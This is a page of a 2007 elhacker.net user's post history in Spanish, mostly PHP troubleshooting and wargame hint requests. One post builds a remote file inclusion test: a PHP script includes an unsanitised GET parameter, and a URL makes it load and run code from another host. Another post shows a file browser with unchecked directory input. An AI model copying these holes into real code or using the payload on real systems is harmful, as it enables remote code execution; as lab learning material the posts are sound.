elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Mensajes
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11
31  Programación / PHP / NAVEGADOR ARCHIVOS en: 30 Noviembre 2007, 13:51 pm
 
 Hola a tod@s, estoy intentando poner un navegador de archivos y directorios en una intranet. El código que uso es este:

Código:


  $dir = (isset($_GET['dir']))?$_GET['dir']:"/";
$directorio=opendir($dir);
echo "<b>Directorio actual:</b><br>$dir<br>";
echo "<b>Archivos:</b><br>";
while ($archivo = readdir($directorio)) {
  if($archivo == '.')
    echo "<a href="?dir=.">$archivo</a><br>";
  elseif($archivo == '..'){
    if($dir != '.'){
      $carpetas = split("/",$dir);
      array_pop($carpetas);
      $dir2 = join("/",$carpetas);
      echo "<a href="?dir=$dir2">$archivo</a><br>";
    }
  }
  elseif(is_dir("$dir/$archivo"))
    echo "<a href="?dir=$dir/$archivo">$archivo</a><br>";
  else echo "$archivo<br>";
}
closedir($directorio); 



El error que me sale es este: Parse error: syntax error, unexpected '='    y me lo indica en la linea   
Código:
elseif($archivo == '..'){ 

Gracias a todos por adelantado
32  Seguridad Informática / WarZone / La escuela...... en: 26 Noviembre 2007, 11:59 am

Hola, puede alguien indicarme algun manual o algo referente a lo que hay que saber para pasar la escuela del mal????

  Por lo que he leido en algunos post, el truco esta en el manejo del path de la cookie, pero  no consigo loguearme de ninguna forma, y ya no se que mas hacer. Tampoco saco nada en claro con la activación del debugueo ya que introduzco como pass lo que me indica pero tampoco funciona, y el enlace de la contraseña olvidada tampoco me lleva a ningun sitio.

 Como decia antes he instalado el cookie editor del fiorefox pero no termino de entender para que usarlo ni cuando en lo que a esta prueba se refiere, ya que imagino que sera despues del logueo....y como no hay forma :(......

   Gracias de antemano.

  pd: Espero no haber dicho nada relevante. Sie es asi por favor editen mi post. Solo quisiera alguna pequeña indicacion para que esto no pierda gracia.....

  pd2: Esta prueba y la del carrito de compra van a acabar con mi salud mental hehehehe
33  Media / Multimedia / Re: Pasar un casette al PC. en: 20 Noviembre 2007, 12:16 pm

 Bien... ya veo que sabes que es un jack grande...un minijack es una clavija igual pero pequeña jejej  hay conversores que puedes poner para pasar de jack a minijack.

  Te lo explicare todo por pasos:

  1: De tu equipo tienes que buscar una salida de audio. Un ejemplo seria el sitio donde se conecta los auriculares, aunque lo ideal es si tiene un Line-out, que es una salida de audio que creo q encontraras en tu equipo de musica (sino recurre a la de los auriculares).

 2: una vez la consigas, usa un cable que de un lado ira conectado a esa salida de audio mediante un jack, y que en la otra parte del cable debe tener un minijack (o un jack con un conversor a minijack).

 3: en tu ordenador, (en la parte trasera probablemente) busca la tarjeta de audio (es donde conectas los altavoces). bien pues en esa misma tarjeta veras que tienes al menos 2 sitios mas donde conectar el minijack. Por lo general si es de color rojo sera el que se usa para el micro y uno azul para entrada de audio tambien.

Cuando lo tengas todo conectado, usa algun programa tipo gold-wave el cual veras que te permite realizar grabaciones indicando de donde viene el audio.

Espero haber mexplicado bien.  Saludos
34  Media / Multimedia / Re: Pasar un casette al PC. en: 20 Noviembre 2007, 09:14 am


 De tu reproductor de Cintas conecta un cable minijack al line-in de tu tarjeta de audio o al mic. Estas son las lineas de entrada de audio al PC. Despues usa cualquier programa de grabacion de audio, por ejemplo Gold-wave...

Saludo
35  Seguridad Informática / WarZone / Hack google..... en: 19 Noviembre 2007, 12:08 pm
 Estoy con la prueba de hack google. Tengo el archivo con user y pass ( o al menos eso parece). He tratado de loguearme usando todas las combinaciones que se me han ocurrido con la info que contiene el archivo ..... pero nada......  solo quiero saber si ese archivo esta para despistar o debos seguir por ahi... el post de Murder que ya la ha pasado no me aclara mucho.

 Gracias de antemano y buena suerte para todos


 YA ESTA!!!!!   LA PASE!!
36  Programación / PHP / Re: busco Un codigo muy sencillo en: 11 Octubre 2007, 11:48 am


  En google pones   php  mysql     hay muchos y muy buenos tutoriales basico que te explican como crear la conexion con la BD, como crear el formulario y como meter esos datos......  no es ni medio hoja de codigo..........  intentalo y si no te sale yo mismo te ayudo....  pero intentalo pq sino no aprenderas nada.......

Saludos
37  Programación / PHP / Re: sigo con problemass.... en: 11 Septiembre 2007, 19:30 pm


   Pues no se pq ya no salen los post anteriores... de todas formas lo acabo de solucionar.. aunke no se como jajajja   gracias por tu ayuda.

 El fallo q aparecia era debido a que me decia q el xamp no estaba bien configurado para URL include

Gracias
38  Programación / PHP / sigo con problemass.... en: 10 Septiembre 2007, 16:05 pm

 Tambien he probado a instalar el apache para windows... y me dice lo mismo. Voy a pegar aki todo el codigo de los 3 archivos a ver si alguien me puede ayudar....


  1. El archivo pruebarfi.html

 
Código:
<HTML><HEAD><TITLE> Prueva de RFI </TITLE></HEAD><BODY>

 <A HREF="rfi.php?cont=hola.html">Hola!</A><BR><BR>
<A HREF="rfi.php?cont=adios.html">Adios!</A>

 </BODY></HTML>

  2. El archivo hola.html...es igual q adios.html... osea solo escrito hola y adios

 
Código:
holaaaa
Código:
adiosssss

  3. El archivo rfi.php

 
Código:
<?php

$var = $_GET["cont"];
include($var);

?>

  4.- El archivo  cede.txt

 
Código:
<?phpecho "<h1>Vulnerable a RFI</h1>";?>

  y lo que paso en la url seria 
Código:
http://192.168.1.2/fri.php?cont=http://192.168.1.3/code.txt
 
  El error que me da es el q reporte arriba


 Gracias a todos 
39  Programación / PHP / Re: Problemas con XAMP en: 8 Septiembre 2007, 20:17 pm


 Pues aunke parecia evidente, una vez modificados los php.ini que me encontre sigo teniendo el mismo problema......

  Espero que podais ayudarme. 



   Gracias
40  Programación / PHP / Re: Problemas con XAMP en: 4 Septiembre 2007, 19:55 pm


 gracias amigos...


 Como siempre un pozo de sabiduri
Páginas: 1 2 3 [4] 5 6 7 8 9 10 11
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines